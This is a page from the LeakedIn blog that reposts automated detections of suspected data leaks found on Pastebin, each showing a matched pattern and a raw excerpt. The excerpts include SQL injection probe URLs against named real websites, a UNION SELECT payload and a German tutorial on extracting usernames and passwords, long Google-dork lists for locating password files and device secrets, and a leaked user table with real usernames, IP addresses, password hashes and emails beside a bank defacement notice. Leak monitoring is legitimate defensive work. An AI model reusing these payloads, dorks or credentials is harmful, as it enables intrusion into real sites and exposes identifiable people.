LeakedIn Logo
Stories About Data Leaks and Related Stuff

Posts Tagged ‘Login/Password List’

Potential leak of data: SQL Injection

1 votedvote

Detected 1 occurrence(s) of ‘[a-zA-Z0-9\-_]=.*UNION\+SELECT’:

rinfo.php?id='34

http://www.kosherconnection.com/memberinfo.php?id='126


http://www.bayareaassn.com/memberinfo.php?id='10


http://www.vlongbiz.com/member/memberinfo.php?id='a9dfe07067ae92df525f0a07f746cc16


http://www.ambervalleybni.co.uk/memberInfo.php?id='-1+union+select+all+1,2,3,concat_ws


http://www.buywithconfidence.info/tradeCategory.php?id='98


http://www.davie-coopercity.org/memberinfo.php?id='272


http://www.buywithconfidence.com/tradeCategory.php?id='235


http://chat.postregister.com/transcript.php?id='13

http:/

Detected 1 occurrence(s) of ‘username[ \t:]+password[ \t:]+email’:

SER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" | "values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"
EZGuestbook"
intext:"
Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Inde

Detected 1 occurrence(s) of ‘enable secret’:

d" | "values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"
EZGuestbook"
intext:"
Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of" passwords modified
intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql.def

Detected 1 occurrence(s) of ‘mysql_[p]*connect\([^\$]‘:

"Unclosed quotation mark before the character string"
"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum
"Warning: Cannot modify header information - headers already sent"
"Warning: Division by zero in" "on line" -forum
"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum
"Warning: mysql_query()" "invalid query"
"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"
"Warning: Supplied argument is not a valid File-Handle resource in"
"Warning:" "faile

Source: pastebin.com/raw.php?i=Pw5JKadD

If you find the content of this pastie suspicious or inappropriate, highlight the relevant piece of text and press Shift + E or click here to notify us.

Potential leak of data: MySQL Connect Information

0 votedvote

Detected 2 occurrence(s) of ‘mysql_[p]*connect\([^\$]‘:

"Unclosed quotation mark before the character string"
"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum
"Warning: Cannot modify header information - headers already sent"
"Warning: Division by zero in" "on line" -forum
"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum
"Warning: mysql_query()" "invalid query"
"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"
"Warning: Supplied argument is not a valid File-Handle resource in"
"Warning:" "faile

Detected 2 occurrence(s) of ‘enable secret’:

SWF
filetype:TXT TXT
filetype:XLS XLS
htpasswd / htpasswd.bak
Index of phpMyAdmin
index of: intext:Gallery in Configuration mode
index.of passlist
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"d.aspx?id" || inurl:"d.aspx?id"
intext:"enable secret 5 $"
intext:"powered by Web Wiz Journal"
intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"
intitle:"--- VIDEO WEB SERVER ---" intext:"Video Web Server" "Any time & Any where" username password
intitle:"500 Internal Server Error"

Detected 1 occurrence(s) of ‘username[ \t:]+password[ \t:]+email’:

SER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" | "values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"EZGuestbook"
intext:"Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of

Source: pastebin.com/raw.php?i=JiA3EpFh

If you find the content of this pastie suspicious or inappropriate, highlight the relevant piece of text and press Shift + E or click here to notify us.

Potential leak of data: Login/Password List

0 votedvote

Detected 1 occurrence(s) of ‘username[ \t:]+password[ \t:]+email’:

SER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" | "values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"EZGuestbook"
intext:"Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of

Detected 1 occurrence(s) of ‘enable secret’:

d" | "values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"EZGuestbook"
intext:"Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of" passwords modified
intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql.default

Source: pastebin.com/raw.php?i=u3S8biWX

If you find the content of this pastie suspicious or inappropriate, highlight the relevant piece of text and press Shift + E or click here to notify us.

Potential leak of data: Login/Password List

0 votedvote

Detected 1 occurrence(s) of ‘username[ \t:]+password[ \t:]+email’:

zu benutzten. Das sieht dann so aus:

http://www.site.de/news.php?id=-5 /**/UNION/**/SELECT/**/1,concat_ws(0x3a,username,password,email),3/**/FROM/**/users/*

Vorraussetzung ist, dass der Column eMail auch existiert.
Die Ausgabe sieht dann so aus:

Username:Password:eMail

Da es noch was wegen dem “and†gab.

http://www.site.de/news.php?id=5 and 1 = 0

Das and 1 = 0 fragt hier ob 1 = 0 ist. Da 1 != 0 ist, ist das also Falsch (false) und daher sollte wenn etwas vuln ist, auf der Page inhaltlich etwas fehlen oder eben 

Source: pastebin.com/raw.php?i=yFbpDvVZ

If you find the content of this pastie suspicious or inappropriate, highlight the relevant piece of text and press Shift + E or click here to notify us.

Potential leak of data: Login/Password List

0 votedvote

Detected 1 occurrence(s) of ‘username[ \t:]+password[ \t:]+email’:

bl_products 	
tbl_promotions 	
tbl_qualifications 	
tbl_regions 	
tbl_reports 	
tbl_search 	
tbl_sections 	
tbl_settings 	
tbl_shareholders 	
tbl_socialresponsibility 	
tbl_testimonies 	
tbl_users
Table: 	tbl_users
Total Rows: 	3

login_ip 	username 	password 	email
41.222.234.6 	regina.agyare 	24e32ad919445843e9ad899866ddb551 	info@infosapplabs.com
41.202.16.138 	iamdatiam 	fbac760679353cf2c4a153dc01a57ed4 	d.dombadoh@gmail.com
41.222.234.6 	treasury 	93bb9d1129af08e535130bbf7a6e9459 	admintreasury@infosapplabs.c

Detected 1 occurrence(s) of ‘[hH][aA4][cC][kK][eE3][dD] [bB][yY]‘:

                www.fidelitybank.com.gh hacked by Rwandan hackers 

http://rwandan-hackers.blogspot.fr

                            TWITTER:@rwandanhackers
 
=================================================================

Target: http://www.fidelitybank.com.gh/
Host IP:184.1

Source: pastebin.com/raw.php?i=Hbvq0UrU

If you find the content of this pastie suspicious or inappropriate, highlight the relevant piece of text and press Shift + E or click here to notify us.